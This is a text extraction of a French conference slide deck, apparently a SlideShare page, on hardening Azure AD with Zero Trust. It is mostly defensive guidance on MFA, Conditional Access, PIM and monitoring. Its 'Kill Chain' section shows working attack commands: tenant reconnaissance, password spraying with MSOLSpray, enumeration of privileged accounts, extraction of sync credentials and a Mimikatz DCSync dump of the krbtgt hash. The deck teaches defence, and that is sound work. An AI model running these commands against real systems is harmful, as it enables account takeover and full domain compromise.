SlideShare a Scribd company logo
Merci à tous nos partenaires !
27 octobre 2022 - PARIS
@IdentityDays #identitydays2022
Jean-François Apréa
CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist
MVP Security | MVP Cloud and Datacenter Management (16)
Author | Speaker | Trainer (MCT Alumni)
Seyfallah Tagrerout
CEO and Founder STC Consulting | Cloud and Security Architect
Microsoft Azure Specialist | Microsoft Zero Trust Specialist
MVP Azure and Enterprise Mobility (8)
Author | Speaker | Trainer
Apply the Zero Trust model for Hardening your Azure AD
27 octobre 2022 - PARIS
Identity Days 2022
27 octobre 2022 - PARIS
Zero Trust? It’s urgent to go, because it’s urgent to be really protected!
• Azure AD & Microsoft Entra
• Zero Trust and Microsoft vision
• Azure AD is Identity and Access Control centric
• Azure AD Kill Chain
• Azure AD Hardening with Zero Trust in mind 😊
• Good practices and 12-step action plan
Agenda
Identity Days 2022
27 octobre 2022 - PARIS
It becomes difficult to be up-to-date …
Hackers don’t give a shit!
Source : Jean-Charles Duret-Ferrari
 About your project’s scope…
 It’s managed buy a third party…
 It’s a legacy system…
 It’s too critical to patch…
 You’ve always done in that way…
 About your Go-Live date…
 It’s only a Pilot/POC not production…
 About NDA…
 It was not a mandatory requirements…
 It is a non-exposed internal system…
 It is hard to change…
 It is handled in the Cloud…
 The vendor does not support this…
 It is an interim solution…
 It is encrypted on disk…
 You cannot explain the Risk to the Business…
 You have other priorities…
 You don’t have a Business justification…
 You cannot have ROI…
 You contracted out that risk…
Really, too many bad reasons!
Azure AD & Microsoft Entra
Identity Days 2022
27 octobre 2022 - PARIS
Identity Days 2022
27 octobre 2022 - PARIS
Azure Active Directory & Microsoft Entra
Azure Active Directory
 Identity & Access Management
 Inter-connected ecosystem
 Security
 Hybrid Cloud
 Several types of Identities
Microsoft Entra
• Azure Active Directory
• Microsoft Entra Permissions Management
• Microsoft Entra Verified ID
• Microsoft Entra Workload Identities
• Microsoft Entra Identity Governance
Identity Days 2022
About Zero Trust and Microsoft vision
Identity Days 2022
27 octobre 2022 - PARIS
Identity Days 2022
27 octobre 2022 - PARIS
Verify explicitly
Use least privileged access
Assume breach
Microsoft Zero Trust vision
Identity Days 2022
27 octobre 2022 - PARIS
Microsoft Zero Trust vision
Assume breach
Assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly
Transforms overall thinking, strategy, and architectures from “safe network” to “open network”
Asset/Node = user, app,
device, data, API, etc.
Verify explicitly
Protect assets against attacker control
by explicitly validating that all trust and
security decisions use all relevant available
information and telemetry
Reduces “attack surface”
of each asset
Use least privilege access
Limit access of a potentially compromised
asset, typically with just-in-time and
just-enough-access (JIT/JEA) and risk-
based polices like adaptive access control
Reduce
blast of compromises
Azure AD is Identity and Access
Control centric
Identity Days 2022
27 octobre 2022 - PARIS
Identity Days 2022
27 octobre 2022 - PARIS
Azure AD Access Control plane
Verification of each
access attempt
Access control to Apps
and Data
Azure AD signals
Never trust, always verify…
Identity Days 2022
27 octobre 2022 - PARIS
Azure AD Access Control
Azure AD Kill Chain ✨😯
Identity Days 2022
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Kill Chain
How to get started 😊
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Kill Chain
Step by step progression 😯
27 octobre 2022 - PARIS
1. Azure AD non-authenticated discovery
2. Search a valid Email account
3. Password Spraying attack
4. Change to User Authenticated session
5. Accounts: List synchronized and cloud accounts
6. Azure AD Connect: Find Sync_Sync01_guid@domain.onmicrosoft.com and AAD Connect VM name in MSOL account
7. Now, by default, all is possible!
8. If you become a local Administrator on AAD Connect, you can extract an encrypted version of MSOL account
passwords via the AAD Connect SQL database or directly from LSASS.exe using the MIMICATZ tool!
9. By now, possible to carry out a DCSync attack to replicate all the password hashes of the AD domain! 😯
10. And finally, via Active Directory, exploit the AAD SSO features by recovering the PASSWORD of AZUREADSSOACC$
Otherwise, at this point, it is possible to access the Azure portal, without providing a password
So, the Azure AD Connect VM must be super secure
Identity Days 2022
Azure AD Kill Chain
Tenant discovery 😯
27 octobre 2022 - PARIS
https://login.microsoftonline.com/
getuserrealm.srf?login=[USERNAM
E@DOMAIN]&xml=1
😯 1st info available anonymously without authentication😯
😯 1st info available anonymously without authentication😯
About your tenant:
 Active or not?
 Name?
 Federated or not?
Identity Days 2022
Azure AD Kill Chain
Tenant discovery 😯
27 octobre 2022 - PARIS
Discovery and Reco Azure Tenant
Free PowerShell modules to install:
GitHub - Gerenios/AADInternals: AADInternals
PowerShell module for administering Azure AD
and Office 365
Get tenant name, branding and DNS name
Get-AADIntLoginInformation -UserName xxxx.domain.onmicrosoft.com
Get tenant ID
Get-AADIntTenantID -Domain testtenant.onmicrosoft.com
Get all additional domains added
Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com
Get tenant general infos
Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com
😯 Third-Party PowerShell modules to find more... 😯
😯 Third-Party PowerShell modules to find more... 😯
Identity Days 2022
Azure AD Kill Chain
Initial access + Password Spray / Brut Force 😯
MSOL Spray tool
https://github.com/dafthack/MSOLSpray
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .userlist.txt -Password IdentityDays$Paris%2022
Basic sample passwords files are available here:
https://github.com/ohmybahgosh/RockYou2021.txt
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Kill Chain
MFA Attack + MFA Fatigue😯
27 octobre 2022 - PARIS
Phishing & Man in the middle
https://veruscorp.com/mfa-
fatigue-leads-to-breach-of-
ubers-corporate-systems/
27/09/2022
MFA Fatigue leads to breach
UBER’S Corporate users
https://github.com/kgretzky/evilginx
Using FIDO2 hardware keys like
YubiKey provides 100% secure MFA
Identity Days 2022
Azure AD Kill Chain
Enumeration😯
27 octobre 2022 - PARIS
AzureAD PowerShell Module
PowerShell Gallery | AzureAD 2.0.2.140
Install-module –Name AzureAD With standard user but without special
privileges!
Connect-AzureAD
Session state and details
Get-AzureADCurrentSessionInfo
Tenant details
Get-AzureADTenantDetail
List all AAD users
Get-AzureADUser -All $true
Get specific user properties
Get-AzureADUser -ObjectId
test@tenanttest.onmicrosoft.com
Get username with “Admin’’ string”
Get-AzureADUser -SearchString "admin"
Get all groups with Admin string
Get-AzureADGroup -All $true |?{$_.Displayname -match
"admin"}
Get all synchronized groups from AD to AAD
Get-AzureADGroup -All $true |
?{$_.OnPremisesSecurityIdentifier -ne $null}
Get all Azure AD groups
Get-AzureADGroup -All $true |
?{$_.OnPremisesSecurityIdentifier -eq $null}
Get all users with Global Administrator role
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global
Administrator'" | Get-AzureADDirectoryRoleMember
Get all Intune managed devices
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
Get all registered Apps
Get-AzureADApplication -All $true
Other useful tools:
 Via Azure portal
 Via PowerShell
 Via Azure CLI
 Access the list of all users, groups,
applications, devices, roles, subscriptions
 Send invitations to Guest type accounts
 Create security groups
 Read group members
 Create a new app
 Add up to 50 Azure AD devices
Warning: By default, an AAD user can 😯
Identity Days 2022
Azure AD Kill Chain
And finally, use of MSOL_* credentials😯
Enumeration via AD PowerShell module
Get-ADUser -Filter "samAccountName -like
'MSOL_*'" - Properties * | select
SamAccountName,Description | fl
Enumeration via Azure AD PowerShell module
Get-AzureADUser -All $true |
?{$_.userPrincipalName - match "Sync_"}
Once the AAD Connect has been analyzed, the
credentials are extracted
Get-AADIntSyncCredentials
27 octobre 2022 - PARIS
The end: MSOL_*account credential + DCSync attack with MIMIKATZ
runas /netonly /user:amslab.corpMSOL_782bef6aa0a9 cmd
Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLabkrbtgt
/domain:amsLab.corp /dc:DC01.amsLab.corp"
Azure AD Hardening ✨👍
Identity Days 2022
27 octobre 2022 - PARIS
Identity Days 2022
27 octobre 2022 - PARIS
Azure AD Hardening
Inspired by Microsoft Entra
Based on customer Experience
 Security projects
 Assessment / audit missions
 Emergency operations
 Remediation
Identity Days 2022
27 octobre 2022 - PARIS
Azure AD Hardening
Always start with Azure AD Quick Wins 👍
Based on customer Experience
 Security projects
 Assessment / audit missions
 Emergency operations
 Remediation
Identity Days 2022
Azure AD Hardening
Always start with Azure AD Quick Wins 👍
Identity Days 2022
Azure AD Hardening
Part1: Enforce your Secrets
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part1: Enforce your Secrets
1. Use Microsoft Secured Score
 Deploy MFA for EVERYONE
 Enable Identity Protection (P2)
2. Use Azure AD Smart Lockout
 For Azure AD cloud accounts
 For hybrid accounts
3. Deploy Passwordless authentication
 FIDO2 Key
 Microsoft Authenticator
4. Create TWO recovery accounts
 Only in Azure AD
 Do not enable synchronization
 Do not use MFA
 Do not use FIDO2 keys
 Disable password expiration
 Activate a strong audit on these two accounts with:
 Azure Log Analytics
 Azure Sentinel
 Cloud App Security (MCAS)
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part1: Hardening Azure MFA
1. MFA Protection
2. Auth Strengths
3. MFA Fraud alert
4. Identity Protection
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part2: Conditional Access Design
Scope audience
 Regular users
 High Privilege Users
 Guest / External Users
 Workload identities
Logical separation in AAD:
 Flexibility
 Granularity
 Lower risk of error
 More “readability”
 Troubleshooting
 Governance
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part2: Conditional Access Design
Best Practices
 Always test behavior
 What if?
 Report-only mode
Area Description
Authentication Policies - Enforce MFA for All administrators
- Enforce MFA for all standard user
- Enforce MFA for all Guest users
- Block Legacy authentication
- Reduce attack surface
Device Access Policies - Block unsupported device platform
- Require managed devices (endpoint Manager) – Admin station
- Require approved app for mobile access (MAM)
- Require managed devices
- Specific conditional access for Mac Os (if needed)
Strict Security Policies - Block MFA registration from untrusted location
- Require Term of use for: All Administrator / Guest Access / Consultants
- Control Sign-in Frequency
- Disable persistent browser
- Block foreign locations
- Require trusted location for all admins
- User Risk-based and Sign-in Risk based (via Identity Protection)
- Authentication context  PIM / MIP labeled SharePoint site / Cloud app security
upload and download
- Privileged access via filters for Devices
- Conditional Access for workload identities
- Block all cloud app except ( Teams / SPO) for Guest Access
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part3: Use PIM Privileged Identity Management (Azure AD P2)
PIM Best Practices
 Enable PIM for privileged accounts
 Enable PIM for all admin roles (Zero Trust)
 Configure each role with MFA
 For a Global Admin account, grant 2H max (Zero Trust)
 Think about the default duration: Permanent for partners
 Configure email notifications to track usage
 Configure Access Reviews for PIM every week
 Activate the Privileged Access group
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part4: Use Microsoft Defender for Identity
Why use Microsoft Defender for Identity?
 Hyperscale SaaS protection in Azure
 Defender for Cloud App integration
 Multi-forest support
 Detection of DC Shadow
 Continuous updates in SaaS mode
 ATA Sensor & ATA Sensor Standalone
 Included with EMS E5, M365 E5 and M365 Security E5
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part5: Identity Governance – Use new Defender for Identity workflows
Create user
account
(status:
disabled)
Launch custom
Logic Apps
workflow
Send email to
hiring manager
with TAP
Group
assignments
Send welcome
email to
new hire
Send email to
onboarding DL
Generate
Temporary
Access Pass
(TAP)
Start date Enable user
account
Add user to
Teams
“New Hires”
channel
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part6: Management of externals Identities and Collaboration
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part6: Externals Identities and new Cross-tenant feature
New Cross-tenant feature best practices
 Use case 1: Configure B2B Collaboration
 Use case 2: Configure B2B Direct Connect
 Configure Inbound in Granular Mode with MFA + Trust Compliance Device Claims
 Configure Outbound with granularity and scope your groups
 Block all B2B collaboration Outbound by default
 Use the Shared Channel
27 octobre 2022 - PARIS
Identity Days 2022
ID Action Impact
01 Dedicated Condtional Access for MFA Medium
02 Dynamic group included all External / Guest users Low
03 CA Hardering : Block all cloud app except ( Teams /
SPO)
High
04 CA Term of use Medium
05 Restriction – Prevent download - Web only Access for
sensitive Teams / SharePoint site
High
06 Session timeout ( daily MFA/ Authentication) High
07 Access review for guest accounts Medium
08 Sensitivity Label for M365 groups ( Teams and
sharepoint Online)
High
09 Dedicated audit log for Guest / External user
access
High
Azure AD Hardening
Part7: Protect yourself against Guest and External users with 9 control points
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part8: Protect your Workload Identities
of workloads can
access Sensitive Data
and Assets
Source: SCIM Quarterly Analysis,
July 7th, 2022
68%
Source: Microsoft Security internal research 2021
Human identities Machine identities
About 5 machine IDs for 1 human ID
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part8: Protect your Workload Identities
Human identities Machine identities
Future: about 20 machine IDs for 1 human ID
 1: Deploy Access Review for SPNs
 2: configure CAs for workload identities
 3: Deploy AAD Identity Protection
 4: Set up the User Consent Workflow
 5: Audit and log with Defender for Cloud
app / Azure Sentinel
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part9: Management of Externals Identities and collaboration
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part10: to go beyond…
User Access Strategy
 User admin ( Cloud Only)
 PIM avec les droits nécessaires
 Global Admin. : 2h
 Other: 4 h
 MFA / Passwordless FIDO2
 Conditional Access:
 Scope User Admins
 Exclude: Break Glace accounts
 Device : Windows
 Emplacement: Trusted Location
 Approve : Require Device to be marked as compliant
 Identity protection
 Sign-in Risk
 User risk
 Password Protection
Privileged Access Workstation
 Azure AD Autopilot profile
 Compliance with Endpoint Manager
 Security & Hardening Device Profile
 Safety Baseline
 Deny BYOD
 Windows Update setup
 Defender for Endpoint - Integration with Endpoint Manager
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part11: The tomorrow model...
Enterprise Access model
 Tier0
 Access Control Plane
 Management
 Tier1
 Management Plan
 Data management
 Application
 Tier2
 User access
 Application access (API, …)
27 octobre 2022 - PARIS
Identity Days 2022
Azure AD Hardening
Part12: SecOps
A SecOps implementation is essential
 Management of unified alerts
 Management of unified Incident
 Log Management / Redirection
 Proactivity
 Automatic playbook trigger via Sentinel
(remember to add Azure AD Data Connectors)
 Remember to have a real Detection /
Hunting and Response strategy
 Don't Forget “Hunting” with KQL
 Use Microsoft 365 Defender “Admin Center”
27 octobre 2022 - PARIS
Conclusion
Identity Days 2022
27 octobre 2022 - PARIS
Zero Trust smooth deployment in 12 steps
Think Hybrid and protect your On-Premise Active Directory environment!
1. Use Azure AD as your IAM
2. Manage Identity and Access
3. Provision users
4. Control All Authentications
5. Implement strong and secure Auths
6. Evaluate Authentications and Credentials
8. Determine Resource Access
7. Determine Trusted Zones
9. Apply minimum privileges
10. Secure administrative rights
11. Take advantage of Conditional Access
12. Train continuously!
Modernize
Identity and
device
management
Consolidation
then legacy
infrastructure
cleanup
Configure secure
access for all
types of users
Secure your
hybrid
environment
Strong
authentications,
conditional access
and intelligent
strategies
Secure experience
for all users
Identity Days 2021
Microsoft Documentation!
Zero Trust Document Center https://docs.microsoft.com/en-us/security/zero-trust/
Monitor your Azure AD Secure Score
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity-
secure-score
Integrate your Apps into Azure AD
https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an-
application-integration
Enable PHS and do not use PTA or ADFS federation
Enable Seamless SSO and minimize the use of ADFS On-Premise
Azure MFA + Passwordless avec FIDO2 (Yubico, …)
Use PIM for IT teams
Use Azure AD Identity Protection for Everyone
Privileged Accounts | backup accounts | MFA | Passwordless
Security Update Guide: Patch and patch again!
https://msrc.microsoft.com/update-guide/
Conditional Access
MFA for Guests
MFA for Everyone
Access policies and trusted locations
Test | What If?
Reports - SecOps
Devices
Azure AD logs (Sign-ins and applications)
Users at risk: logins, locations, IP, GPS, Cloud App Security
Azure Sentinel
Passwords
SSPR
Smart Lockout Azure AD / Active Directory
Password Protection
Education & Communication with Users
Internal training / Cyber best practices
Finally, our Zero Trust “To-do list”
Merci à tous nos partenaires !
27 octobre 2022 - PARIS
@IdentityDays #identitydays2022 Merci à tous ✨👍

More Related Content

What's hot

End to End Guide Windows AutoPilot Process via Intune
End to End Guide Windows AutoPilot Process via IntuneEnd to End Guide Windows AutoPilot Process via Intune
End to End Guide Windows AutoPilot Process via Intune
Anoop Nair
 
Microsoft Azure ad in 10 slides
Microsoft Azure ad in 10 slidesMicrosoft Azure ad in 10 slides
Microsoft Azure ad in 10 slides
Andre Debilloez
 
Understanding Azure AD
Understanding Azure ADUnderstanding Azure AD
Understanding Azure AD
New Horizons Ireland
 
3 Modern Security - Secure identities to reach zero trust with AAD
3   Modern Security - Secure identities to reach zero trust with AAD3   Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD
Andrew Bettany
 
Securing your Azure Identity Infrastructure
Securing your Azure Identity InfrastructureSecuring your Azure Identity Infrastructure
Securing your Azure Identity Infrastructure
Vignesh Ganesan I Microsoft MVP
 
Microsoft Azure Active Directory
Microsoft Azure Active DirectoryMicrosoft Azure Active Directory
Microsoft Azure Active Directory
David J Rosenthal
 
Identity and Access Management from Microsoft and Razor Technology
Identity and Access Management from Microsoft and Razor TechnologyIdentity and Access Management from Microsoft and Razor Technology
Identity and Access Management from Microsoft and Razor Technology
David J Rosenthal
 
Azure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep DiveAzure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep Dive
Naohiro Fujie
 
Introduction to Azure AD and Azure AD B2C
Introduction to Azure AD and Azure AD B2CIntroduction to Azure AD and Azure AD B2C
Introduction to Azure AD and Azure AD B2C
Joonas Westlin
 
Secure your Access to Cloud Apps using Microsoft Defender for Cloud Apps
Secure your Access to Cloud Apps using Microsoft Defender for Cloud AppsSecure your Access to Cloud Apps using Microsoft Defender for Cloud Apps
Secure your Access to Cloud Apps using Microsoft Defender for Cloud Apps
Vignesh Ganesan I Microsoft MVP
 
Best Practices for Active Directory with AWS Workloads
Best Practices for Active Directory with AWS WorkloadsBest Practices for Active Directory with AWS Workloads
Best Practices for Active Directory with AWS Workloads
Amazon Web Services
 
Azure security and Compliance
Azure security and ComplianceAzure security and Compliance
Azure security and Compliance
Karina Matos
 
Identity Security - Azure Identity Protection
Identity Security - Azure Identity ProtectionIdentity Security - Azure Identity Protection
Identity Security - Azure Identity Protection
Eng Teong Cheah
 
Azure role based access control (rbac)
Azure role based access control (rbac)Azure role based access control (rbac)
Azure role based access control (rbac)
Srikanth Kappagantula
 
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days
 
Microsoft 365 Enterprise Security with E5 Overview
Microsoft 365 Enterprise Security with E5 OverviewMicrosoft 365 Enterprise Security with E5 Overview
Microsoft 365 Enterprise Security with E5 Overview
David J Rosenthal
 
48. Azure Active Directory - Part 1
48. Azure Active Directory - Part 148. Azure Active Directory - Part 1
48. Azure Active Directory - Part 1
Shawn Ismail
 
Azure AD の新しいデバイス管理パターンを理解しよう
Azure AD の新しいデバイス管理パターンを理解しようAzure AD の新しいデバイス管理パターンを理解しよう
Azure AD の新しいデバイス管理パターンを理解しよう
Yusuke Kodama
 
5 modern desktop - windows autopilot
5   modern desktop - windows autopilot5   modern desktop - windows autopilot
5 modern desktop - windows autopilot
Andrew Bettany
 
Azure Network Security Groups (NSG)
Azure Network Security Groups (NSG)Azure Network Security Groups (NSG)
Azure Network Security Groups (NSG)
Shawn Ismail
 

What's hot (20)

End to End Guide Windows AutoPilot Process via Intune
End to End Guide Windows AutoPilot Process via IntuneEnd to End Guide Windows AutoPilot Process via Intune
End to End Guide Windows AutoPilot Process via Intune
 
Microsoft Azure ad in 10 slides
Microsoft Azure ad in 10 slidesMicrosoft Azure ad in 10 slides
Microsoft Azure ad in 10 slides
 
Understanding Azure AD
Understanding Azure ADUnderstanding Azure AD
Understanding Azure AD
 
3 Modern Security - Secure identities to reach zero trust with AAD
3   Modern Security - Secure identities to reach zero trust with AAD3   Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD
 
Securing your Azure Identity Infrastructure
Securing your Azure Identity InfrastructureSecuring your Azure Identity Infrastructure
Securing your Azure Identity Infrastructure
 
Microsoft Azure Active Directory
Microsoft Azure Active DirectoryMicrosoft Azure Active Directory
Microsoft Azure Active Directory
 
Identity and Access Management from Microsoft and Razor Technology
Identity and Access Management from Microsoft and Razor TechnologyIdentity and Access Management from Microsoft and Razor Technology
Identity and Access Management from Microsoft and Razor Technology
 
Azure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep DiveAzure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep Dive
 
Introduction to Azure AD and Azure AD B2C
Introduction to Azure AD and Azure AD B2CIntroduction to Azure AD and Azure AD B2C
Introduction to Azure AD and Azure AD B2C
 
Secure your Access to Cloud Apps using Microsoft Defender for Cloud Apps
Secure your Access to Cloud Apps using Microsoft Defender for Cloud AppsSecure your Access to Cloud Apps using Microsoft Defender for Cloud Apps
Secure your Access to Cloud Apps using Microsoft Defender for Cloud Apps
 
Best Practices for Active Directory with AWS Workloads
Best Practices for Active Directory with AWS WorkloadsBest Practices for Active Directory with AWS Workloads
Best Practices for Active Directory with AWS Workloads
 
Azure security and Compliance
Azure security and ComplianceAzure security and Compliance
Azure security and Compliance
 
Identity Security - Azure Identity Protection
Identity Security - Azure Identity ProtectionIdentity Security - Azure Identity Protection
Identity Security - Azure Identity Protection
 
Azure role based access control (rbac)
Azure role based access control (rbac)Azure role based access control (rbac)
Azure role based access control (rbac)
 
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
Identity Days 2022 - Quel est l’avenir de l’annuaire Active Directory ?
 
Microsoft 365 Enterprise Security with E5 Overview
Microsoft 365 Enterprise Security with E5 OverviewMicrosoft 365 Enterprise Security with E5 Overview
Microsoft 365 Enterprise Security with E5 Overview
 
48. Azure Active Directory - Part 1
48. Azure Active Directory - Part 148. Azure Active Directory - Part 1
48. Azure Active Directory - Part 1
 
Azure AD の新しいデバイス管理パターンを理解しよう
Azure AD の新しいデバイス管理パターンを理解しようAzure AD の新しいデバイス管理パターンを理解しよう
Azure AD の新しいデバイス管理パターンを理解しよう
 
5 modern desktop - windows autopilot
5   modern desktop - windows autopilot5   modern desktop - windows autopilot
5 modern desktop - windows autopilot
 
Azure Network Security Groups (NSG)
Azure Network Security Groups (NSG)Azure Network Security Groups (NSG)
Azure Network Security Groups (NSG)
 

Similar to Appliquez le modèle Zero Trust pour le Hardening de votre Azure AD !

IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud MicrosoftIdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
Identity Days
 
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days
 
Azure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDKAzure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDK
Peter Selch Dahl
 
FIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud JumeletFIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
Identity Days
 
What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?
Vignesh Ganesan I Microsoft MVP
 
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Chirag Patel
 
Microsoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdfMicrosoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdf
JohnDoe583546
 
SC-900+2022.pdf
SC-900+2022.pdfSC-900+2022.pdf
SC-900+2022.pdf
Ritish H
 
October 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know WebinarOctober 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know Webinar
Robert Crane
 
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
Tomasz Poszytek
 
Fundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and ComplianceFundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and Compliance
Vignesh Ganesan I Microsoft MVP
 
Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022
Daniel Toomey
 
Azure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for DevelopersAzure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for Developers
John Garland
 
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxConfidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Carlo Sacchi
 
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ..."Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
Fwdays
 
Information Barriers in MS Teams
Information Barriers in MS TeamsInformation Barriers in MS Teams
Information Barriers in MS Teams
Nanddeep Nachan
 
Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022
Daniel Toomey
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish Kalamati
Girish Kalamati
 
Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022
Daniel Toomey
 
Introduction to basic governance in Azure - #GABDK
Introduction to basic governance in Azure - #GABDKIntroduction to basic governance in Azure - #GABDK
Introduction to basic governance in Azure - #GABDK
Peter Selch Dahl
 

Similar to Appliquez le modèle Zero Trust pour le Hardening de votre Azure AD ! (20)

IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud MicrosoftIdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
 
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
 
Azure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDKAzure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDK
 
FIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud JumeletFIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
 
What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?
 
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
 
Microsoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdfMicrosoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdf
 
SC-900+2022.pdf
SC-900+2022.pdfSC-900+2022.pdf
SC-900+2022.pdf
 
October 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know WebinarOctober 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know Webinar
 
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
 
